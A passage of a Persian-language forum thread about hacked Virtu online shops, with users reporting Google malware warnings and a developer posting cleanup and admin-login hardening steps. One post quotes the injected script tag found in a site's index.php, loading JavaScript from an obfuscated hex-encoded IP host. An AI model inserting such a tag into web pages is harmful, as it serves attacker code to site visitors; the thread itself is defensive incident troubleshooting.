صفحات (5): « اولين < قبلی 1 2 [3] 4 5 بعدی > آخرين »
بررسی فنی مشکلات امنیتی ویرچو
نويسنده پيغام
anf-b
Member
***


ارسالها: 94
گروهها: Registered
ورودى‌ها: تیر 1384
وضعيت: آفلاين
اعتبار: 0
پست: #21
RE: بررسی فنی مشکلات امنیتی ویرچو

سلام به همه ی آقایون !
دو تا از سایتهام با اینکه تمامیه روش های امنیتی که فرموده بودید رو مو به مو انجام داده بودم همین الان
Reported Attack Page!
شدند

این سایتها:

http://www.sardian.net
http://www.wwepars.com

لطفا یکی راهنمایی کنه



08-25-1389 04:36 قبل‌ازظهر
پیدا کردن تمامی ارسالهای کاربر
Samad Kushan
توسعه دهنده
*****
developer

ارسالها: 185
گروهها: developer
ورودى‌ها: تیر 1388
وضعيت: آفلاين
اعتبار: 7
پست: #22
RE: بررسی فنی مشکلات امنیتی ویرچو

با سلام
نمی دونم شما چه روشهای بازداری استفاده کردید، و آیا اونها کارساز بوده اند یا نه و از کی این روشها رو اعمال کرده اید.
بهرحال باید بدونید که پروسه تایید Reported Attack Page! یک دوره زمانی 90 روزه می باشد برای اطلاعات بیشتر لینکهای زیر را برای مشاهده گزارش گوگل از سایت شما و دلیل اینکه چرا چنین تشخیصی داده است ، بررسی نمایید:

http://safebrowsing.clients.google.com/s...ardian.net

http://safebrowsing.clients.google.com/s...wepars.com

متاسفانه برای اطمینان از امنیت کامل سایتتون کمی منتظر بمونید تا نسخه میانی منتشر بشه.
موفق باشید




Preserve my soul, for I am holy: save thy servant, O my God, that trusteth in thee.
Douay-Rheims Bible - Psalm 86:2
08-25-1389 11:22 بعدازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
anf-b
Member
***


ارسالها: 94
گروهها: Registered
ورودى‌ها: تیر 1384
وضعيت: آفلاين
اعتبار: 0
پست: #23
RE: بررسی فنی مشکلات امنیتی ویرچو

من به سرور اطلاع دادم که بک آپ 10 روز پیش رو لود کنند!
الان هم به گوگل اطلاع دادم تا دوباره سایت رو بازبینی کنه
خدا کنه مشکل فعلا حل بشه




پ.ن:

در فایل Index.php در روت سایت در لاین 36 به یک اسکریپت مجهول برخورد کردم:

کد:
<head><script type="text/javascript" src="http://0xc16aadb7/statistics.js"></script>


لطفا پیگیری کنید



اين ارسال آخرين بار در تاريخ: 08-26-1389 01:18 قبل‌ازظهر ويرايش شده است. شخص ويرايشگر: anf-b.

08-26-1389 01:00 قبل‌ازظهر
پیدا کردن تمامی ارسالهای کاربر
anf-b
Member
***


ارسالها: 94
گروهها: Registered
ورودى‌ها: تیر 1384
وضعيت: آفلاين
اعتبار: 0
پست: #24
RE: بررسی فنی مشکلات امنیتی ویرچو

دوستان الان مطمئن شدم مشکل از همون قسمت بود ، چون گوگل هم فقط همین رو به عنوان ویروس شناخته!



الصاق كردن فايل تصویر(های) کوچک
   


08-26-1389 02:39 قبل‌ازظهر
پیدا کردن تمامی ارسالهای کاربر
anf-b
Member
***


ارسالها: 94
گروهها: Registered
ورودى‌ها: تیر 1384
وضعيت: آفلاين
اعتبار: 0
پست: #25
RE: بررسی فنی مشکلات امنیتی ویرچو

آقا یکی بیاد به داد ما برسه ! من همش این پیج index.php رو دوباره آپلود میکنم باز دوباره اون تگ بعد از چند ساعت بهش اضافه میشه
لا اقل یک فروشگاه ساز دیگه معرفی کنید که تا بشه دیتا بیس ویرچو رو بهش کانورت کرد
ممنون



08-30-1389 07:57 بعدازظهر
پیدا کردن تمامی ارسالهای کاربر
ramindiba
Member
***


ارسالها: 234
گروهها: Registered
ورودى‌ها: ارد 1385
وضعيت: آفلاين
اعتبار: 3
پست: #26
RE: بررسی فنی مشکلات امنیتی ویرچو

سلام
با یه برنامه FTP تمام فایلهای داخل هاستت رو برحسب تاریخ مرتب کن و ببین اولین فایلها ( منظورم آخرین تاریخ آپلود فایلها) کدام هستن . احتمالا از یکی از این فایلها دارن اینکار رو میکنن. مخصوصا تو ادمین رو بیشتر بررسی کن . دیدی تاریخ ویرایش فایلها جدید هستن اونها رو کنترل کن و تو هاردت ذخیره کن و برای ما بفرست تا کنترل کنیم. و بعد فایلهای صحیح رو آپلود کن. و بعدش پرمیژن ها رو هم درست کن.
موفق باشی !!!




توانمندی این پورتال را در فروشگاههای ما ببینید :
نسخه جدید :

فروشگاه تخصصی نرم افزار کیش و مات

کلوب اینترنت

نسخه قدیمی :

فروشگاه تخصصی تجهیزات بارکدی دیبا

فروشگاه تی تی مارکت

09-01-1389 05:53 قبل‌ازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
Samad Kushan
توسعه دهنده
*****
developer

ارسالها: 185
گروهها: developer
ورودى‌ها: تیر 1388
وضعيت: آفلاين
اعتبار: 7
پست: #27
RE: بررسی فنی مشکلات امنیتی ویرچو

سلام
پیرو جلسه ای که با حضور توسعه دهندگان ویرچو برگزار شد، پلن نسخه 1.3 تهیه شد که بزودی در دسترس عموم قرار میگیرد.
در این نسخه تمامی مشکلات امنیتی برطرف شده و یکسری امکانات دیگر اضافه می شود و با این حال سعی شده است طوری طرح ریزی شود که در کمترین زمان ممکن این نسخه منتشر شود تا زمان انتشار نسخه 1.5 که طولانی شده است و بسیار متفاوتتتر می باشد نیازهای فعلی استفاده کنندگان ویرچو مرتفع شود.
فعلا برای تمامی دوستانی که سایتهاشون هک شده، پیشنهاد می کنم مراحل زیر را با دقت انجام دهند تا فعلا از لحاظ امنیتی مشکلی نداشته باشند.(برای کسانیکه هنوز سانتشون مورد حمله قرار نگرفته اند نیز پشنهاد می کنم عملیات زیر را از مرحله 5 به بعد اجرا نمایند، که در اینصورت نیازی به اجرای مرحله 7 نیز نخواهد بود)
در واقع مراحل زیر به عنوان راه حل سریع عنوان میشود:

1- مثل همیشه قبل از هرکاری از کل فروشگاهتون نسخه پشتیبان تهیه کنید. تا اگر مشکلی داشتید بتونید براحتی بازیابی نمایید.

2- فایلهای زیر رو داونلود کنید و در جایی ذخیره کنید، (بعد از اینکه کارمون تموم شد این فایلها رو باید جایگزین کنیم):
includes/configure.php
admin/includes/configure.php

3- تمامی فایلها و پوشه های فروشگاه رو غیر از images و download حذف نمایید. در داخل پوشه images تمامی شاخه ها و زیر شاخه ها رو جستجو کنید و تمامی فایلهای php رو حذف کنید.

4- فایلها و پوشه های نسخه 1.1.1 رو غیر از images , dowload آپلود کنید.(در صورتیکه از نسخه 1.2 قبلا استفاده می کردید و یا در کدهای ویرچو تغییراتی داده اید، باید به جای آپلود نسخه 1.1.1 ، از آن نسخه ها باید استفاده نمایید )

5- فایلهای زیر رو حذف نمایید:
admin/define_language.php
admin/file_manager.php

6- تغیرات زیر را در کدهای برنامه انجام دهید:
الف- فایل admin/includes/application_top.php رو با یک ادیتور مناسب باز کنید و در سطر حدودا 223(آخرین سطرهای اسکریپت میباشد ) کد زیر را پیدا کنید:

کد PHP:
if (basename($PHP_SELF) != FILENAME_LOGIN && basename($PHP_SELF) != FILENAME_PASSWORD_FORGOTTEN) {
    
tep_admin_check_login();
  } 

و آنرا با با کد زیر جایگزین نمایید:

کد PHP:
if (!defined(DONOT_CHECK_LOGIN_FALG) || DONOT_CHECK_LOGIN_FALG != 'true') {
    
tep_admin_check_login();
  } 


ب- فایلهای زیر را با یک ادیتور مناسب بازنمایید:
admin/login.php
admin/password_forgotten.php

و قبل از اولین کد اسکریپت یعنی کد زیر:

کد PHP:
require('includes/application_top.php'); 

تکه کد زیر را اضافه نمایید:

کد PHP:
define('DONOT_CHECK_LOGIN_FALG''true'); 


7- آخرین کاری که باید انجام دهید، این است که فایلهای زیر رو با پشتیبانی که در مرحله 2 تهیه کرده اید، جایگزین نمایید:
includes/configure.php
admin/includes/configure.php

در صورتیکه این مراحل رو با موفقیت طی نمایید می توانید به میزان قابل توجهی امنیت سایتتون رو بالا ببرید.

در آخر برای کمک به توسعه نرم افزار لطفا قابلیت Raw Access Log هاست (server's access log) رو طوری تنظیم نمایید که تمامی دسترسیها از این به بعد log شوند، تا در صورتیکه دوباره با مشکل امنیتی مواجه شدید، همین فایلها رو به دپارتمان پشتیانی از طریق ایمیل suppot@e-virtu.com ارسال نمایید تا بررسی شود و راه حل مناسب در اختیار تمامی دوستان قرار داده شود.
با تشکر و احترام
کوشان
دپارتمان پشتیبانی
شرکت فنآوری اطلاعات تاوریژ




Preserve my soul, for I am holy: save thy servant, O my God, that trusteth in thee.
Douay-Rheims Bible - Psalm 86:2

اين ارسال آخرين بار در تاريخ: 09-01-1389 09:36 بعدازظهر ويرايش شده است. شخص ويرايشگر: Samad Kushan.

09-01-1389 08:33 بعدازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
Gorgeaseman
یک فیلم ، یک تجربه
***
tester

ارسالها: 366
گروهها: tester
ورودى‌ها: تیر 1388
وضعيت: آفلاين
اعتبار: 2
پست: #28
RE: بررسی فنی مشکلات امنیتی ویرچو

با تشکر از زحماتتون، در مرحله 6ب، منظور از فایل های زیر کدوم فایل هاست؟




 
فرمان دادم تا بدنم را بدون این که مومیایی کنند و یا در تابوت بگذارند در گور قرار دهند تا ذرات تنم خاک ایران شود.

>> کورش کبیر <<

 
09-01-1389 09:27 بعدازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
Samad Kushan
توسعه دهنده
*****
developer

ارسالها: 185
گروهها: developer
ورودى‌ها: تیر 1388
وضعيت: آفلاين
اعتبار: 7
پست: #29
RE: بررسی فنی مشکلات امنیتی ویرچو

با تشکر از گرگ آسمان عزیز، مرحله 6 ب تصحیح شد




Preserve my soul, for I am holy: save thy servant, O my God, that trusteth in thee.
Douay-Rheims Bible - Psalm 86:2
09-01-1389 09:37 بعدازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
anf-b
Member
***


ارسالها: 94
گروهها: Registered
ورودى‌ها: تیر 1384
وضعيت: آفلاين
اعتبار: 0
پست: #30
RE: بررسی فنی مشکلات امنیتی ویرچو

با تشکر از شما

جدیدا با اینکه همه سایت خوب بود ولی باز گوگل سایت رو ویروس دار میشناخت
تا اینکه متوجه شدم در پوشه images فایل index.html ویروسیه
موفق باشید



09-01-1389 10:03 بعدازظهر
پیدا کردن تمامی ارسالهای کاربر

نمايش نسخه قابل چاپ
فرستادن اين مبحث به يك دوست
مشترك شده در اين مبحث | افزودن اين مبحث به موارد موردعلاقه

پرش در انجمن: